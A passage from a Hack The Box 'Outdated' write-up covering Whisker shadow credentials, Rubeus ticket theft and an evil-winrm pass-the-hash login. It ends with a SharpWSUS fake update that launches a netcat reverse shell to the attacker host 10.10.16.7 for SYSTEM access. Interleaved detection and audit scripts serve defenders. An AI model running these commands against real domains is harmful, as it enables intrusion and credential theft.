2 sid to domain mappings.
0 global catalog mappings.
2024-10-10T08:53:24.4171382-07:00|INFORMATION|SharpHound Enumeration Completed at 8:53 AM on 10/10/2024! Happy Graphing!
PS C:\Users\btables\Desktop> dir
dir


Directory: C:\Users\btables\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/10/2024 8:53 AM 11819 20241010085323_BloodHound.zip
-a---- 10/10/2024 8:53 AM 8553 MjdhMDc5MjItNDk4MS00NjFiLWFkY2ItZjQ0ZTBlODI3Mzhh.bin
-a---- 10/10/2024 8:51 AM 1046528 s.exe


PS C:\Users\btables\Desktop>

17. Transfer the file back over SMB

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

PS C:\Users\btables\Desktop> net use \\10.10.16.7\share
net use \\10.10.16.7\share
The command completed successfully.

PS C:\Users\btables\Desktop> copy 20241010085323_BloodHound.zip \\10.10.16.7\share\
copy 20241010085323_BloodHound.zip \\10.10.16.7\share\
PS C:\Users\btables\Desktop>

18. Next, analyze it

19. Download the exploitation tool and exploit

https://github.com/eladshamir/Whisker

https://github.com/sh1yan/HTB-Tools-Macos/blob/main/SharpCollection/NetFramework_4.7_Any/Whisker.exe

PS C:\Users\btables\Desktop> iwr http://10.10.16.7/Whisker.exe -outfile w.exe
iwr http://10.10.16.7/Whisker.exe -outfile w.exe
PS C:\Users\btables\Desktop> dir
dir


Directory: C:\Users\btables\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/10/2024 8:53 AM 11819 20241010085323_BloodHound.zip
-a---- 10/10/2024 8:53 AM 8553 MjdhMDc5MjItNDk4MS00NjFiLWFkY2ItZjQ0ZTBlODI3Mzhh.bin
-a---- 10/10/2024 8:51 AM 1046528 s.exe
-a---- 10/10/2024 9:08 AM 41984 w.exe


PS C:\Users\btables\Desktop>

20. Run it to look for any current entries for sflowers. There are none:

.\w.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb

PS C:\Users\btables\Desktop> .\w.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb
.\w.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Listing deviced for sflowers:
[*] No entries!
PS C:\Users\btables\Desktop>

21. There are no entries for that user, so keep going and run the command to add one

C:\Users\btables\Desktop>.\w.exe add /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb /password:shiyan10
.\w.exe add /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb /password:shiyan10
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 0a0da7f4-d194-4f06-a7f9-e196850227fb
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"shiyan10" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

C:\Users\btables\Desktop>

22. The next command to run here

PS C:\Users\btables\Desktop> iwr http://10.10.16.7/Rubeus.exe -outfile r.exe
iwr http://10.10.16.7/Rubeus.exe -outfile r.exe
PS C:\Users\btables\Desktop>


PS C:\Users\btables\Desktop> .\r.exe asktgt /user:sflowers /certificate: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 /password:"shiyan10" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

23. For some reason the correct output never showed up here; it just hung. According to the walkthrough, the output below should normally appear.

ServiceName : krbtgt/outdated.htb
ServiceRealm : OUTDATED.HTB
UserName : sflowers
UserRealm : OUTDATED.HTB
StartTime : 7/19/2022 9:35:34 PM
EndTime : 7/20/2022 7:35:34 AM
RenewTill : 7/26/2022 9:35:34 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : eS3rWh1yyu+COnBYg9XS8A==
ASREP (key) : 86CBEDAED5565CD4F39BE0D34BDCD874

[*] Getting credentials using U2U

CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5




SFLOWERS@OUTDATED.HTB


net user sflowers /domain

C:\Users\Administrator\Desktop>net user sflowers
net user sflowers
User name sflowers
Full Name Susan Flowers
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/20/2022 11:04:09 AM
Password expires Never
Password changeable 6/21/2022 11:04:09 AM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/15/2022 10:48:27 PM

Logon hours allowed All

Local Group Memberships *Remote Management Use*WSUS Administrators
Global Group memberships *Domain Users
The command completed successfully.


C:\Users\Administrator\Desktop>


C:\Users\Administrator\Desktop>net user sflowers /domain
net user sflowers /domain
User name sflowers
Full Name Susan Flowers
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/20/2022 11:04:09 AM
Password expires Never
Password changeable 6/21/2022 11:04:09 AM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/15/2022 10:48:27 PM

Logon hours allowed All

Local Group Memberships *Remote Management Use*WSUS Administrators
Global Group memberships *Domain Users
The command completed successfully.


C:\Users\Administrator\Desktop>
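Detection for the Whisker and Rubeus steps above, added as an example (not code from the writeup, Whisker or Rubeus): it flags event 5136 writes to msDS-KeyCredentialLink by a principal other than the object itself, then correlates them with a certificate-based TGT request (event 4768, PreAuthType 16) for the same account. The event records, allowlists, DN lookup and certificate issuer value are constructed assumptions.

```python
#!/usr/bin/env python3
"""Flag shadow-credential activity (Whisker add + Rubeus asktgt) in Security events.

Added example; not code from the writeup, Whisker or Rubeus. Whisker's "add"
writes a KeyCredential into the target's msDS-KeyCredentialLink; with a SACL
auditing writes to that attribute, the DC logs event 5136 (directory service
object modified). The following Rubeus asktgt /certificate is a PKINIT logon,
logged as 4768 with PreAuthType 16 and the certificate fields filled in.
All events below are constructed samples mirroring the writeup's scenario.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional

KEYCRED_ATTR = "msds-keycredentiallink"
VALUE_ADDED = "%%14674"     # 5136 OperationType: Value Added
PKINIT_PREAUTH = "16"       # 4768 PreAuthType: PA-PK-AS-REP (certificate logon)

# Assumed allowlists for this environment (constructed): principals that
# legitimately write the attribute, and the enterprise CA's issuer name.
TRUSTED_WRITERS = {"aad_sync_svc"}
TRUSTED_CERT_ISSUERS = {"cn=outdated-enterprise-ca"}

T0 = datetime(2024, 10, 10, 9, 10, 0)
SAMPLE_EVENTS: List[Dict] = [
    # sflowers enrolling a key on her own object (Windows Hello style): benign.
    {"EventID": 5136, "TimeCreated": T0 - timedelta(days=30), "SubjectUserName": "sflowers",
     "ObjectDN": "CN=Susan Flowers,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    # The Whisker add from the btables foothold against sflowers.
    {"EventID": 5136, "TimeCreated": T0, "SubjectUserName": "btables",
     "ObjectDN": "CN=Susan Flowers,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    # Rubeus asktgt with the self-signed certificate two minutes later (constructed issuer).
    {"EventID": 4768, "TimeCreated": T0 + timedelta(minutes=2), "TargetUserName": "sflowers",
     "PreAuthType": "16", "CertIssuerName": "CN=sflowers", "CertThumbprint": "<constructed>",
     "IpAddress": "172.16.20.20"},
    # An ordinary password-based TGT request: ignored.
    {"EventID": 4768, "TimeCreated": T0 + timedelta(minutes=3), "TargetUserName": "btables",
     "PreAuthType": "2", "CertIssuerName": "", "CertThumbprint": "", "IpAddress": "172.16.20.20"},
]
# DN -> sAMAccountName lookup (assumed to come from a directory query).
DN_TO_SAM = {"cn=susan flowers,cn=users,dc=outdated,dc=htb": "sflowers"}


@dataclass
class Alert:
    rule: str
    target: str
    actor: str
    time: datetime
    detail: str


def _lc(value: Optional[str]) -> str:
    return (value or "").lower()


def detect_keycred_writes(events: Iterable[Dict], dn_to_sam: Dict[str, str]) -> List[Alert]:
    """Rule 1: a KeyCredential was added by a principal other than the object itself."""
    alerts: List[Alert] = []
    for e in events:
        if (e.get("EventID") != 5136 or e.get("OperationType") != VALUE_ADDED
                or _lc(e.get("AttributeLDAPDisplayName")) != KEYCRED_ATTR):
            continue
        actor = _lc(e.get("SubjectUserName"))
        target = dn_to_sam.get(_lc(e.get("ObjectDN")), "")
        # Self-writes (a user or machine registering its own key) are expected.
        if actor == target or actor in TRUSTED_WRITERS:
            continue
        alerts.append(Alert("keycredential-added-by-other-principal", target or e["ObjectDN"],
                            actor, e["TimeCreated"],
                            f"{actor} wrote msDS-KeyCredentialLink on {e['ObjectDN']}"))
    return alerts


def detect_pkinit_after_write(events: Iterable[Dict], writes: List[Alert],
                              window: timedelta = timedelta(hours=1)) -> List[Alert]:
    """Rule 2: a certificate TGT request for a Rule-1 target within the window,
    using a certificate not issued by the enterprise CA."""
    alerts: List[Alert] = []
    for e in events:
        if e.get("EventID") != 4768 or e.get("PreAuthType") != PKINIT_PREAUTH:
            continue
        if _lc(e.get("CertIssuerName")) in TRUSTED_CERT_ISSUERS:
            continue
        user = _lc(e.get("TargetUserName"))
        for w in writes:
            if w.target == user and w.time <= e["TimeCreated"] <= w.time + window:
                delay = int((e["TimeCreated"] - w.time).total_seconds())
                alerts.append(Alert("pkinit-logon-after-shadow-credential", user, w.actor,
                                    e["TimeCreated"],
                                    f"certificate TGT for {user} from {e.get('IpAddress')} "
                                    f"{delay}s after {w.actor}'s write"))
    return alerts


if __name__ == "__main__":
    writes = detect_keycred_writes(SAMPLE_EVENTS, DN_TO_SAM)
    for a in writes + detect_pkinit_after_write(SAMPLE_EVENTS, writes):
        print(f"{a.time:%H:%M:%S} {a.rule}: {a.detail}")
```

Event 5136 only appears when the domain's object-access auditing and a SACL on the user objects cover writes to msDS-KeyCredentialLink, so enable that before relying on Rule 1.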

24. Never mind; following the walkthrough, grab the first flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -u sflowers -i dc.outdated.htb -H 1FCDB1F6015DCB318CC77BB2BDA14DB5

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sflowers\Documents> dir
*Evil-WinRM* PS C:\Users\sflowers\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\sflowers\Desktop> dir


Directory: C:\Users\sflowers\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/3/2022 4:19 PM 514472 PsExec64.exe
-ar--- 10/10/2024 7:53 AM 34 user.txt


*Evil-WinRM* PS C:\Users\sflowers\Desktop> type user.txt
754c1b43f8b51944615929b25c7208c7
*Evil-WinRM* PS C:\Users\sflowers\Desktop>

0x02 Getting system access

25. Identify WSUS: the registry key HKLM:\software\policies\microsoft\windows\WindowsUpdate shows the WSUS server in use. From the client:

C:\Users\Administrator\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\Desktop> Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate


SetActiveHours : 1
ActiveHoursStart : 0
ActiveHoursEnd : 23
AcceptTrustedPublisherCerts : 1
ExcludeWUDriversInQualityUpdate : 1
DoNotConnectToWindowsUpdateInternetLocations : 1
WUServer : http://wsus.outdated.htb:8530
WUStatusServer : http://wsus.outdated.htb:8530
UpdateServiceUrlAlternate :
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies
\microsoft\windows\WindowsUpdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies
\microsoft\windows
PSChildName : WindowsUpdate
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry



PS C:\Users\Administrator\Desktop>
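A check for the WSUS client policy shown above, added as an example (not code from the writeup or SharpWSUS): it parses the Get-ItemProperty listing and reports the plaintext-HTTP WSUS server and the AcceptTrustedPublisherCerts setting a defender should review. The sample listing is constructed from the values in the output above.

```python
#!/usr/bin/env python3
"""Assess a client's WSUS policy for the weaknesses this writeup exploits.

Added example; not code from the writeup or SharpWSUS. It parses the text that
Get-ItemProperty prints for the WindowsUpdate policy key (name : value lines,
long values wrapped onto indented continuation lines) and reports the settings
a defender should review. The sample listing is constructed from the values
shown in the writeup's output.
"""
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import urlsplit

SAMPLE_OUTPUT = """
SetActiveHours                               : 1
ActiveHoursStart                             : 0
ActiveHoursEnd                               : 23
AcceptTrustedPublisherCerts                  : 1
ExcludeWUDriversInQualityUpdate              : 1
DoNotConnectToWindowsUpdateInternetLocations : 1
WUServer                                     : http://wsus.outdated.htb:8530
WUStatusServer                               : http://wsus.outdated.htb:8530
UpdateServiceUrlAlternate                    :
PSPath                                       : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\software\\policies
                                               \\microsoft\\windows\\WindowsUpdate
PSChildName                                  : WindowsUpdate
"""

LINE_RE = re.compile(r"^(\S+)\s*:\s?(.*)$")


@dataclass
class Finding:
    id: str
    severity: str
    message: str


def parse_itemproperty(text: str) -> Dict[str, str]:
    """Turn a Get-ItemProperty listing into a dict, dropping PS* provider metadata.

    Continuation lines (indented, no 'name :' prefix) extend the previous value.
    """
    props: Dict[str, str] = {}
    last = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = LINE_RE.match(raw)
        if m:
            last = m.group(1)
            props[last] = m.group(2).strip()
        elif last is not None:
            props[last] += raw.strip()
    return {k: v for k, v in props.items() if not k.startswith("PS")}


def assess_wsus_policy(props: Dict[str, str]) -> List[Finding]:
    """Report the policy settings that let the WSUS attack in this writeup work."""
    findings: List[Finding] = []
    for key in ("WUServer", "WUStatusServer"):
        url = props.get(key, "")
        if url and urlsplit(url).scheme.lower() == "http":
            findings.append(Finding(
                f"{key.lower()}-plaintext-http", "high",
                f"{key} is {url}: update metadata travels over plaintext HTTP, so an on-path "
                f"attacker can substitute approved updates (WSUSpect); serve WSUS over TLS on "
                f"8531 and point this policy at the https:// URL."))
    if props.get("AcceptTrustedPublisherCerts") == "1":
        findings.append(Finding(
            "accept-trusted-publisher-certs", "medium",
            "AcceptTrustedPublisherCerts=1: clients also install locally published updates "
            "signed by the WSUS publisher certificate, so WSUS Administrators (sflowers' group "
            "in this box) can push more than Microsoft-signed binaries; review who holds that "
            "role and what is published."))
    if props.get("DoNotConnectToWindowsUpdateInternetLocations") == "1" and findings:
        findings.append(Finding(
            "wsus-is-sole-update-source", "info",
            "Clients never reach Microsoft Update directly; the WSUS server above is the "
            "single point of trust for patching, which raises the impact of the findings above."))
    return findings


if __name__ == "__main__":
    for f in assess_wsus_policy(parse_itemproperty(SAMPLE_OUTPUT)):
        print(f"[{f.severity}] {f.id}: {f.message}")
```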

26. WSUS only runs Microsoft-signed binaries. Since I have no good way to obtain an MS signing certificate, I have to use a legitimate tool. The article suggests the Sysinternals tool PsExec. I'll download Sysinternals, copy PsExec.exe to my web server, and upload it:

*Evil-WinRM* PS C:\Users\sflowers\Desktop> upload SharpWSUS.exe sw.exe

Info: Uploading /home/kali/Desktop/SharpWSUS.exe to C:\Users\sflowers\Desktop\sw.exe

Data: 65536 bytes of 65536 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\sflowers\Desktop> upload PsExec64.exe \programdata\ps.exe

Info: Uploading /home/kali/Desktop/PsExec64.exe to C:\Users\sflowers\Desktop\programdata\ps.exe

Data: 499924 bytes of 499924 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\sflowers\Desktop> copy C:\Users\sflowers\Desktop\programdata\ps.exe .
*Evil-WinRM* PS C:\Users\sflowers\Desktop> dir


Directory: C:\Users\sflowers\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/10/2024 9:58 AM programdata
-a---- 10/10/2024 9:58 AM 374944 ps.exe
-a---- 8/3/2022 4:19 PM 514472 PsExec64.exe
-a---- 10/10/2024 9:57 AM 49152 sw.exe
-ar--- 10/10/2024 7:53 AM 34 user.txt


*Evil-WinRM* PS C:\Users\sflowers\Desktop> upload nc.exe

Info: Uploading /home/kali/Desktop/nc.exe to C:\Users\sflowers\Desktop\nc.exe

Data: 79188 bytes of 79188 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\sflowers\Desktop>

27. After the uploads are done, run the exploit:

*Evil-WinRM* PS C:\Users\sflowers\Desktop> .\sw.exe create /payload:"C:\Users\sflowers\Desktop\ps.exe" /args:" -accepteula -s -d C:\Users\sflowers\Desktop\nc.exe -e cmd.exe 10.10.16.7 445" /title:"CVE-2022-30190"

____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: ps.exe
[*] Payload Path: C:\Users\sflowers\Desktop\ps.exe
[*] Arguments: -accepteula -s -d C:\Users\sflowers\Desktop\nc.exe -e cmd.exe 10.10.16.7 445
[*] Arguments (HTML Encoded): -accepteula -s -d C:\Users\sflowers\Desktop\nc.exe -e cmd.exe 10.10.16.7 445

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 32
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 33
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:c5687e3e-43ad-4527-8575-033151b0a584 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:c5687e3e-43ad-4527-8575-033151b0a584 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:c5687e3e-43ad-4527-8575-033151b0a584 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

*Evil-WinRM* PS C:\Users\sflowers\Desktop>
*Evil-WinRM* PS C:\Users\sflowers\Desktop> .\sw.exe approve /updateid:c5687e3e-43ad-4527-8575-033151b0a584 /computername:dc.outdated.htb /groupname:"CriticalPatches"

____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: CriticalPatches
Added Computer To Group
Approved Update

[*] Approve complete

*Evil-WinRM* PS C:\Users\sflowers\Desktop>

28. At this point we have obtained the administrator shell:

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.175] 62202
Microsoft Windows [Version 10.0.17763.1432]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

29. Retrieve the final flag:

C:\Windows\system32>cd C:\Users\Administrator
cd C:\Users\Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2170-25D8

Directory of C:\Users\Administrator\Desktop

08/13/2022 09:40 PM <DIR> .
08/13/2022 09:40 PM <DIR> ..
10/10/2024 07:53 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 8,094,789,632 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
efaf3915c9f3ba9003ca6952cfc0d359

C:\Users\Administrator\Desktop>
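A defender-side audit for the WSUS abuse shown in steps 25 to 27, added here as an example that is not part of the original writeup. It assumes the WSUS administration assemblies are installed on the WSUS host, and takes the server name and port (DC, 8530) from the SharpWSUS enumeration output above.

```powershell
# Added example, not from the original writeup: audit checks for the WSUS
# abuse shown in steps 25-27. Run in an elevated PowerShell on the WSUS host.
# Assumptions: WSUS console assemblies installed; host/port taken from the
# 'WSUS Server Enumeration via SQL' output on this page.

# --- Client side (step 25): where does this machine pull updates from? ---
$wu = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate' -ErrorAction SilentlyContinue
if ($wu -and $wu.WUServer -like 'http://*') {
    Write-Warning "WUServer $($wu.WUServer) uses plain HTTP; update traffic is not protected in transit"
}

# --- Server side (steps 26-27): what has been published and approved locally? ---
$wsusHost = 'dc.outdated.htb'   # assumption: from the enumeration output above
$wsusPort = 8530
[void][Reflection.Assembly]::LoadWithPartialName('Microsoft.UpdateServices.Administration')
$server = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer($wsusHost, $false, $wsusPort)

# Packages published locally never come from Microsoft Update; a SharpWSUS
# 'create' shows up as UpdateSource = Other with a recent CreationDate.
$local = $server.GetUpdates() | Where-Object { $_.UpdateSource -ne 'MicrosoftUpdate' }
foreach ($u in $local) {
    "[LOCAL UPDATE] $($u.Title)  created $($u.CreationDate)  approved=$($u.IsApproved)"
    # Each approval records who approved it and for which target group
    # (on this box: a new group 'CriticalPatches' containing only the DC).
    foreach ($a in $u.GetUpdateApprovals()) {
        "    approval: $($a.Action) for group '$($a.GetComputerTargetGroup().Name)' by $($a.AdministratorName) at $($a.CreationDate)"
    }
}

# Who is allowed to publish and approve at all: the local WSUS Administrators group.
Get-LocalGroupMember -Group 'WSUS Administrators' | Select-Object Name, ObjectClass, PrincipalSource
```

A locally sourced update approved for the domain controller by an unexpected account, or a plain-HTTP WUServer, is the signal to investigate; removing the rogue approval and pruning WSUS Administrators membership closes the path used above.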

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/490


Outdated-htb-writeup
https://sh1yan.top/2024/10/10/Outdated-htb-writeup/
Author
shiyan
Published on
October 10, 2024
License